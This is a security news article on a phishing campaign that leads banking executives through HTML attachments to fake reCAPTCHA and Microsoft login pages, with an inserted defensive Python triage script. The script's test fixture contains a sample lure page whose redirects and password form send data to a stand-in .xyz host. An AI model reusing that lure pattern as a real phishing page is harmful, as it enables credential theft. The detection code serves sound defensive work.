Phishing Attack Uses Fake Google reCAPTCHA
Zscaler Says It Prevented Over 2,500 Phishing Attacks
A Microsoft-themed phishing campaign is using a phony Google reCAPTCHA page in an attempt to steal credentials from senior employees at various organizations, according to a new report by security firm Zscaler. The company says it blocked more than 2,500 phishing emails tied to the campaign.
Zscaler’s threat research team, ThreatLabZ, which identified the campaign, notes that it has been active since December 2020 and has mainly targeted senior employees in the banking sector.
Attack Tactics
The campaign begins with phishing emails that appear to come from a unified communications system of the kind organizations use to streamline corporate communication. Each email carries a malicious HTML attachment.
When a victim opens the attached HTML file, it redirects the browser to a phishing domain under the .xyz top-level domain that is disguised as a legitimate Google reCAPTCHA page.
After the victim completes the fake reCAPTCHA check, they are sent to a spoofed Microsoft login page. Once credentials have been entered on the attackers’ site, a fake “validation successful” message is displayed to lend the process legitimacy.
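The lure chain above (HTML attachment, redirect to a lookalike reCAPTCHA page, credential form) leaves static traces that can be checked before anyone opens the file. A genuine reCAPTCHA widget is served from Google’s own hosts, so a “reCAPTCHA” page on an unrelated .xyz domain is itself the tell. The following Python triage script is an added example, not code from the original article or from Zscaler: it pulls every redirect and form-submission target out of an HTML attachment and flags hosts that are not the brand the page imitates. The trusted-host list, the brand keyword list and both sample attachments are assumptions constructed for this example.

```python
"""Static triage of an HTML email attachment.

Added example (not code from the original article or from Zscaler): pull every
redirect and form-submission target out of an HTML lure and flag hosts that do
not belong to the brand the page imitates. The trusted-host list, brand keyword
list and the sample attachments are assumptions constructed for this example.
"""
import re
from urllib.parse import urlparse

# Hosts a genuine Microsoft sign-in or Google reCAPTCHA flow may use.
# Assumption for this example: any other host is treated as untrusted.
TRUSTED_HOSTS = (
    "login.microsoftonline.com",
    "login.live.com",
    "www.google.com",
    "www.gstatic.com",
    "www.recaptcha.net",
)

# Brand terms that show up in lookalike hostnames (assumption, extend as needed).
BRAND_KEYWORDS = ("microsoft", "office", "recaptcha", "google")

# Redirect mechanisms typically embedded in an HTML lure.
META_REFRESH = re.compile(
    r'<meta[^>]+http-equiv=["\']?refresh["\']?[^>]+content=["\'][^"\']*url=([^"\'\s>]+)',
    re.IGNORECASE,
)
JS_ASSIGN = re.compile(r'location(?:\.href)?\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)
JS_CALL = re.compile(r'location\.(?:replace|assign)\(\s*["\']([^"\']+)["\']', re.IGNORECASE)
FORM_ACTION = re.compile(r'<form[^>]+action=["\']([^"\']+)["\']', re.IGNORECASE)


def extract_targets(html: str) -> list:
    """Return the unique redirect/form targets in document order."""
    found = []
    for pattern in (META_REFRESH, JS_ASSIGN, JS_CALL, FORM_ACTION):
        found.extend(m.group(1) for m in pattern.finditer(html))
    return list(dict.fromkeys(found))


def host_of(url: str) -> str:
    """Lower-cased hostname of an absolute URL, or '' for a relative one."""
    return (urlparse(url).hostname or "").lower()


def is_trusted(host: str) -> bool:
    """Exact or subdomain match against TRUSTED_HOSTS (no substring matching)."""
    return any(host == t or host.endswith("." + t) for t in TRUSTED_HOSTS)


def triage(html: str) -> list:
    """Return one finding per suspicious absolute target, with the reasons."""
    findings = []
    for url in extract_targets(html):
        host = host_of(url)
        if not host:
            continue  # relative target: stays on the local file, cannot exfiltrate
        reasons = []
        if not is_trusted(host):
            reasons.append("host not in trusted list")
        if host.endswith(".xyz"):
            reasons.append("uncommon TLD (.xyz)")
        if not is_trusted(host) and any(k in host for k in BRAND_KEYWORDS):
            reasons.append("brand keyword in lookalike host")
        if reasons:
            findings.append({"url": url, "host": host, "reasons": reasons})
    return findings


# Constructed sample styled as a unified-communications alert whose HTML
# redirects to a fake reCAPTCHA page on a .xyz domain, as described above.
SAMPLE_LURE = """<!DOCTYPE html>
<html><head><title>New message</title>
<meta http-equiv="refresh" content="0; url=https://secure-recaptcha-verify.xyz/check?id=1234">
<script>
  setTimeout(function () {
    window.location.href = "https://secure-recaptcha-verify.xyz/check?id=1234";
  }, 3000);
</script></head>
<body>
<p>You have a new message. If you are not redirected, sign in below.</p>
<form action="https://secure-recaptcha-verify.xyz/login" method="post">
  <input name="email"><input name="password" type="password">
</form>
</body></html>"""

# Constructed benign page: a form that posts to the real Microsoft sign-in host.
SAMPLE_BENIGN = """<html><body>
<form action="https://login.microsoftonline.com/common/oauth2/authorize" method="post">
  <input name="login_hint">
</form>
</body></html>"""


if __name__ == "__main__":
    for finding in triage(SAMPLE_LURE):
        print(f"{finding['host']}: {', '.join(finding['reasons'])}  <- {finding['url']}")
    print("benign findings:", triage(SAMPLE_BENIGN))
```

Run against the constructed lure, both targets on secure-recaptcha-verify.xyz are reported with all three reasons, while the benign form that posts to login.microsoftonline.com produces no findings. The host check is deliberately an exact or subdomain match rather than a substring match, so a host such as login.microsoftonline.com.evil.example is not mistaken for the real sign-in endpoint. In a mail gateway the same logic would run over the decoded attachment body before delivery.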
“These attacks can be categorized as BEC [business email compromise] although the sender, in this case, involves use of popular unified communication systems used by the organizations,” Gayathri Anbalagan, the lead researcher on the Zscaler study, points out. “We are not able to attribute this campaign to a specific threat actor, but looking at the operational theme and the target profiles, it is likely to be a single coordinated campaign.”
Social Engineering Campaign
Since the pandemic began, attackers have increasingly relied on social engineering lures that impersonate familiar business services to steal credentials.
In January, security firm Trend Micro uncovered a targeted phishing campaign that used a fake Microsoft Office 365 update to steal email credentials from business executives (see: Phishing Campaign Features Fake Office 365 Update).
In August 2020, Trend Micro uncovered a business email compromise scam that targeted the Office 365 accounts of business executives at more than 1,000 companies worldwide (see: BEC Scam Targets Executives’ Office 365 Accounts).
In July 2020, a report by security firm Abnormal Security found hackers were mimicking automated messages from Microsoft SharePoint for a phishing campaign that attempts to steal Office 365 credentials (see: Phishing Campaign Uses Fake SharePoint Alerts).